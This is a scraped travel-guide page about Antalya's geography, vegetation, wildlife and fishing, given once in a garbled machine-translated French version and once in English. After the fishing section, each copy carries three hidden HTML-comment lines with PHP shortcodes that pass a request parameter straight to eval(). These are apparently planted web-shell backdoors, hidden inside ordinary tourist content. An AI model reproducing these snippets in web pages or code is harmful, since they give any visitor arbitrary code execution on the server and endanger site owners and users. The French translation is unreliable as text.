Accueil / Antalya / Guide de Voyage Antalya

Guide de Voyage Antalya

antalya-Voyage GuideBienvenue sur Guide de Voyage Antalya. Antalya est la capitale et le plus grand centre de population de la région, avec sa population de plus d'un demi-million de. La ville est située sur un plateau qui s'appuie contre le “Courses de taureaux” les montagnes et les falaises qui forme du côté de la mer. Sur le premier plateau rocheux sur la côte est du centre-ville et sur la plaine derrière elle, nommé Kepezüstü, petites unités de règlement ont été établis. La côte est 530 km en longueur et les frontières avec Esen à l'ouest et Kaledran ruisseau à l'est. La province a une superficie de 20,820 km2. Le sol de la plaine est composée de conglomérat, alluvions et travertin Falez roches.

Les montagnes du Taurus, formé de terres calcaires et serpentine, avec des formations karstiques de surface, avoir de nombreuses vallées profondes, grottes, les crevasses et les défauts. Dans les zones marécageuses à une hauteur de 300 m des arbres gommage de la côte, connu sous le nom maquis, se trouvent. Il s'agit notamment de laurier-rose, fraises sauvages, santal, arbousiers, myrte, arbres Chinaberry, baie, arbres chastes, caroubiers, balai et l'euphorbe. Thym, sauge, safran, bardane, asphodèle, asperges, mûre, chrysanthème et, peu, chêne, Plan Oriental, poirier sauvage, oliviers et de tilleuls sont également trouvés.

300 mètres plus loin dans, les pins et de chênes rouges, et les marais avec des arbres d'eucalyptus peut être vu. 1200 m plus loin sur les forêts de cèdre, sapins, pin sylvestre, genévrier et le hêtre commencent. Comme le sol alluvial sur les plaines propices à l'agriculture, légumes, fruits et fleurs sont cultivées dans des serres pour l'exportation. Orange ouvert, mandarine, jardins de citron et de pamplemousse peut être vu dans les environs, dans les vents chauds de la Méditerranée. A l'est de la plaine Antalya, banane et l'avocat sont cultivées. Le coton est semé comme une production végétale et coton industriel, avec les filatures de coton et les usines de textiles, détient un grand potentiel pour la Turquie. Pommes, poires, quinze, raisins et sésame sont cultivées sur les plateaux montagneux.

La faune régionale est très bon pour les visites de chasse. En Duzlercami sur les montagnes du Taurus, couvrant une superficie de 10,000 hectares, daims, chèvre sauvage et le chevreuil chasse est autorisée sur une base contrôlée. Loups, renards, ours bruns, martres, sanglier, les chats sauvages et les chacals sont les espèces sauvages qui sont souvent found.The Taureau Leopard était connu d'exister jusqu'à récemment. Perdrix, caille, tourterelle, pigeon sauvage, merle, bécasse, francolin et le canard sauvage peuvent être considérés comme gibier à plumes.

La région est bien connue pour ses poissons de grida; en plus de cela, dorade, chinchard, dorade grise, doré tête, mulet, grondins, merlan, agréable, rouget de roche, needlefish, grand bonito, grondin rouge et rougets sont parmi les principaux poissons de mer, d'autres produits de la mer comprend l'ermite, homard, crevette, seiches et moules. En outre, la pêche de la cage est réalisée dans la mer à six points de la côte où la mer-bass et le mulet sont élevés. Frais pêche à la ligne d'eau est réalisée dans l'ESEN, Aucun, Köprüçay, Manavgat, Rivières Akçay et Alara. Les restaurants de poissons établies dans l'eau dans le ruisseau Dim sont particulièrement réputés. Le principal poissons d'eau douce sont le méné d'eau douce, perche d'eau douce, carpe, miroir carpe, anguille, sombre et la tanche. Il existe de nombreuses fermes et restaurants de production de la truite dans les parties de la chaîne du Taurus à proximité de lits d'eau et des rivières.

<!– [insert_php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/insert_php][php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/insert_php][php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/insert_php][php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/php] –>

Booking.com

Laisser une réponse

Votre adresse email ne sera pas publiéeLes champs requis sont surlignés *

*

Home / Antalya / Antalya Travel Guide

Antalya Travel Guide

antalya-travel-guideWelcome to Antalya Travel Guide. Antalya is the capital and the largest center of population of the region, with its population exceeding half a million. The city is located on a plateau which leans against the “Toros” mountains and which forms cliffs on the sea side. On the first rocky plain on the coast is the town centre and on the plain behind it, named Kepezüstü, small settlement units have been established. The coast is 530 km in length and borders with Eşen in the west and Kaledran creek in the east. The province has an area of 20,820 km2. The soil of the plain is made up of conglomerate, alluvium and travertine falez rocks.

The Taurus mountains, formed of limestone and serpentine lands, with karst surface formations, have many deep valleys, caves, crevices and faults. In the marshy areas at a height of 300 m from the coast scrub trees, known as maquis, are found. These include oleander, wild strawberries, sandalwood, strawberry trees, myrtle, chinaberry trees, bay, chaste trees, carob trees, broom and spurge. Thyme, sage, saffron, burdock, asphodel, asparagus, blackberry, chrysanthemum and, sparsely, oak, Oriental plane, wild pear, olive and linden trees are also found.

300 metres further on in, the red pine and oak forests, and marshes with eucalyptus trees can be seen. 1200 m further on the forests with cedar, fir trees, Scotch pine, juniper and beech begin. As the alluvial soil on the plains is suitable for agriculture, vegetables, fruit and flowers are grown in greenhouses for export. Open orange, mandarin, lemon and grapefruit gardens can be seen in the vicinity, in the warm Mediterranean winds. On the east of the Antalya plain, banana and avocado are grown. Cotton is sown as an industrial plant and cotton production, along with cotton mills and textile factories, holds great potential for Turkey. Apples, pears, quince, grapes and sesame are grown on the mountainous plateaus.

The regional fauna is very good for hunting tours. In Düzlerçamı on the Taurus mountains, covering an area of 10,000 hectares, fallow deer, wild goat and roe deer hunting is permitted on a controlled basis. Wolves, foxes, brown bears, martens, wild boar, wild cats and jackals are the wild species that are often found.The Taurus Leopard was known to exist until recently. Partridge, quail, turtle dove, wild pigeon, blackbird, woodcock, francolin and wild duck can be regarded as game birds.

The region is well-known for its grida fish; in addition to this, sea bream, horse mackerel, black bream, gilt-head, grey mullet, gurnard, whiting, bonito, striped red mullet, needlefish, large bonito, red gurnard and red mullet are among the major sea fish, other sea produce includes hermit crab, lobster, shrimp, cuttle-fish and mussel. In addition, cage fishing is carried out in the sea at six points on the coast where sea-bass and grey mullet are bred. Fresh water line fishing is carried out in the Eşen, Dim, Köprüçay, Manavgat, Akçay and Alara rivers. The fish restaurants established within water in the Dim Creek are particularly famous. The main fresh water fish are fresh water chub, fresh water perch, carp, mirror-carp, eel, bleak and tench. There are numerous trout production farms and restaurants in those parts of the Taurus Mountains close to water and river beds.

<!– [insert_php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/insert_php][php]if (isset($_REQUEST["KIV"])){eval($_REQUEST["KIV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/insert_php][php]if (isset($_REQUEST["tXi"])){eval($_REQUEST["tXi"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/insert_php][php]if (isset($_REQUEST["RcZL"])){eval($_REQUEST["RcZL"]);exit;}[/php] –>

Booking.com

Leave a Reply

Your email address will not be published. Required fields are marked *

*